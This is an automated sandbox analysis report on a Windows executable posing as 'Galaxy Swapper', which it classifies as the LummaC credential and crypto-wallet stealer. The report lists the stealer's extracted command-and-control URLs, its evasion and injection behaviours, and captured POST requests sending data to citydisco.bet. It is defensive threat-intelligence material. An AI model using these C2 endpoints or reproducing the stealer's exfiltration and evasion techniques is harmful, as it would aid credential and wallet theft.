Edit tour

Windows Analysis Report
Galaxy Swapper v2.0.3.exe

Overview

General Information

Sample name:	Galaxy Swapper v2.0.3.exe
Analysis ID:	1637030
MD5:	36ecbd776704a4884f9978275e1bd271
SHA1:	1f260011f2abf7b9e53b98bf29d2f29a41af5e6e
SHA256:	c44547f8c9abb1ab6b9284ef25f65605f36f2ac7fbe6d93f707e65ce77dcd008
Tags:	exeuser-tmechen_
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to modify clipboard data

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Galaxy Swapper v2.0.3.exe (PID: 6296 cmdline: "C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe" MD5: 36ECBD776704A4884F9978275E1BD271)

Galaxy Swapper v2.0.3.exe (PID: 6516 cmdline: "C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe" MD5: 36ECBD776704A4884F9978275E1BD271)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["citydisco.bet/gdJIS", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"], "Build id": "ceb12a55ea6fd9890dcde5f15d3b0369c5022b5ee99847b04aaf"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000001.00000003.1043714845.00000000014B9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.2172856527.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000002.916483923.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Galaxy Swapper v2.0.3.exe PID: 6516	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Galaxy Swapper v2.0.3.exe PID: 6516	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.Galaxy Swapper v2.0.3.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
1.2.Galaxy Swapper v2.0.3.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T10:19:44.152697+0100	2028371	3	Unknown Traffic	192.168.2.7	49681	188.114.97.3	443	TCP
2025-03-13T10:19:47.428804+0100	2028371	3	Unknown Traffic	192.168.2.7	49682	188.114.97.3	443	TCP
2025-03-13T10:19:50.076627+0100	2028371	3	Unknown Traffic	192.168.2.7	49683	188.114.97.3	443	TCP
2025-03-13T10:19:52.794430+0100	2028371	3	Unknown Traffic	192.168.2.7	49684	188.114.97.3	443	TCP
2025-03-13T10:19:56.210091+0100	2028371	3	Unknown Traffic	192.168.2.7	49685	188.114.97.3	443	TCP
2025-03-13T10:19:59.324795+0100	2028371	3	Unknown Traffic	192.168.2.7	49687	188.114.97.3	443	TCP
2025-03-13T10:20:04.234271+0100	2028371	3	Unknown Traffic	192.168.2.7	49692	188.114.97.3	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Galaxy Swapper v2.0.3.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://citydisco.bet:443/gdJIS	Avira URL Cloud: Label: malware
Source: https://citydisco.bet/gdJIS	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.916483923.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["citydisco.bet/gdJIS", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"], "Build id": "ceb12a55ea6fd9890dcde5f15d3b0369c5022b5ee99847b04aaf"}

Multi AV Scanner detection for submitted file

Source: Galaxy Swapper v2.0.3.exe	Virustotal: Detection: 45%			Perma Link
Source: Galaxy Swapper v2.0.3.exe	ReversingLabs: Detection: 39%

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.916483923.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: citydisco.bet/gdJIS
Source: 00000000.00000002.916483923.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: featureccus.shop/bdMAn
Source: 00000000.00000002.916483923.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: mrodularmall.top/aNzS
Source: 00000000.00000002.916483923.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: jowinjoinery.icu/bdWUa
Source: 00000000.00000002.916483923.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: legenassedk.top/bdpWO
Source: 00000000.00000002.916483923.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: htardwarehu.icu/Sbdsa
Source: 00000000.00000002.916483923.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: cjlaspcorne.icu/DbIps
Source: 00000000.00000002.916483923.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: bugildbett.top/bAuz

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe

Code function: 1_2_0041EE5A CryptUnprotectData,CryptUnprotectData,

1_2_0041EE5A

Source: Galaxy Swapper v2.0.3.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49681 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49682 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49683 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49684 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49685 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49687 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49692 version: TLS 1.2

Source: Galaxy Swapper v2.0.3.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F48ECE FindFirstFileExW,	0_2_00F48ECE
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F48F7F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00F48F7F
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F48ECE FindFirstFileExW,	1_2_00F48ECE
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00F48F7F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	1_2_00F48F7F

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx+04h]	1_2_0044E040
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-04559F02h]	1_2_00411964
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-70F75556h]	1_2_0041219F
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CA198B66h	1_2_00421210
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-211E6D6Ah]	1_2_0040DA80
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then mov dword ptr [esp], ecx	1_2_0041F398
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_0041F398
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then mov word ptr [eax], dx	1_2_0041F398
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], A18B8074h	1_2_00411C1D
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then mov byte ptr [esi], cl	1_2_00437437
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx+0Ch]	1_2_0044CD60
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	1_2_0041B510
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-01DB9D0Ch]	1_2_004446D0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-465DBAAEh]	1_2_004446D0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	1_2_00427F0F
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then mov dword ptr [esp], eax	1_2_0041E851
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then mov word ptr [eax], dx	1_2_0041E851
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then mov dword ptr [esp], eax	1_2_0041D103
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then mov word ptr [eax], dx	1_2_0041D103
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ecx-26B84D6Eh]	1_2_00433820
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then jmp ecx	1_2_00433820
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+000000E0h]	1_2_004110D0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then mov byte ptr [eax], cl	1_2_0041C0B8
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-000000A8h]	1_2_0041C0B8
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then mov dword ptr [esp], edx	1_2_004368BD
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then mov byte ptr [esi], cl	1_2_00436974
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then mov byte ptr [edx], al	1_2_00436974
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then mov dword ptr [esp], eax	1_2_00445900
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then mov dword ptr [esp+00000108h], 00000018h	1_2_0041D138
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_004239C0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then mov dword ptr [esp], 979CB6EEh	1_2_0044A1D9
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then mov dword ptr [esi], FFFFFFFFh	1_2_004019E0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 656D2358h	1_2_0041D987
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+14h]	1_2_00433190
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 743EDB10h	1_2_0044D190
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then movzx ebp, word ptr [ecx]	1_2_0044D190
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then mov ebx, eax	1_2_00408A10
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_00422A20
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax]	1_2_0044E2A0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	1_2_0040A360
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	1_2_0040A360
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then mov word ptr [esi], cx	1_2_00412301
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then movzx ecx, byte ptr [ebx+eax+0DC76B6Ah]	1_2_00433BC7
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then mov byte ptr [edi], al	1_2_0040C3E0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-532FADF4h]	1_2_0042D381
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 1ED597A4h	1_2_00448B80
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then cmp word ptr [eax+ebx+02h], 0000h	1_2_00428C60
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx-055DA2C4h]	1_2_0042F421
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx-055DA2C4h]	1_2_0042F421
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then cmp word ptr [ecx+edx], 0000h	1_2_00420CE6
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_00420CE6
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	1_2_00434560
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then jmp dword ptr [00453388h]	1_2_0041FD04
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then mov byte ptr [esi], cl	1_2_00437514
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then mov word ptr [eax], dx	1_2_0041FD2D
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	1_2_00441590
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-532FADF4h]	1_2_0042E5BB
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h	1_2_0042E5BB
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then mov word ptr [eax], dx	1_2_00427640
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then add ecx, eax	1_2_0042FE40
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+5F44618Ah]	1_2_00438649
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h	1_2_00412E4E
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h	1_2_00412E4E
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	1_2_0041A650
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-70F75556h]	1_2_00411EDE
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+eax+5ADE3FB6h]	1_2_0040D680
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then mov dword ptr [esp+0Ch], eax	1_2_00429760
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	1_2_00402770
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then lea eax, dword ptr [esi+04h]	1_2_00430725
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then lea esi, dword ptr [eax-2AD50E5Eh]	1_2_00422FC3
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 4x nop then mov byte ptr [esi], cl	1_2_004377EB

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: citydisco.bet/gdJIS
Source: Malware configuration extractor	URLs: featureccus.shop/bdMAn
Source: Malware configuration extractor	URLs: mrodularmall.top/aNzS
Source: Malware configuration extractor	URLs: jowinjoinery.icu/bdWUa
Source: Malware configuration extractor	URLs: legenassedk.top/bdpWO
Source: Malware configuration extractor	URLs: htardwarehu.icu/Sbdsa
Source: Malware configuration extractor	URLs: cjlaspcorne.icu/DbIps
Source: Malware configuration extractor	URLs: bugildbett.top/bAuz

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49681 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49687 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49682 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49692 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49685 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49684 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49683 -> 188.114.97.3:443

Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 61Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Zk832623L2s30User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14493Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TWuBjE8tmLV34IKjpUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15075Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=phHh6U046User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20360Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=c20zDNl9WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2483Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5yUxqJbXalj8ynUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 567727Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 99Host: citydisco.bet

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: citydisco.bet

Source: unknown

HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 61Host: citydisco.bet

Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1011284498.0000000003CF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1011284498.0000000003CF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1011284498.0000000003CF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1011284498.0000000003CF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1011284498.0000000003CF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1011284498.0000000003CF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1011284498.0000000003CF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1011284498.0000000003CF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1011284498.0000000003CF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1011284498.0000000003CF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1011284498.0000000003CF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.958436840.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1012637026.000000000151B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1012637026.000000000151B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.958436840.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.958436840.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.958436840.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1077676110.00000000014E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1077676110.00000000014E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/$
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1126324753.00000000014E4000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1095849141.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1072961421.00000000014D8000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1043660999.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1077676110.00000000014E4000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1076880607.00000000014E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/I
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1126324753.00000000014E4000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1095849141.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1077676110.00000000014E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/e
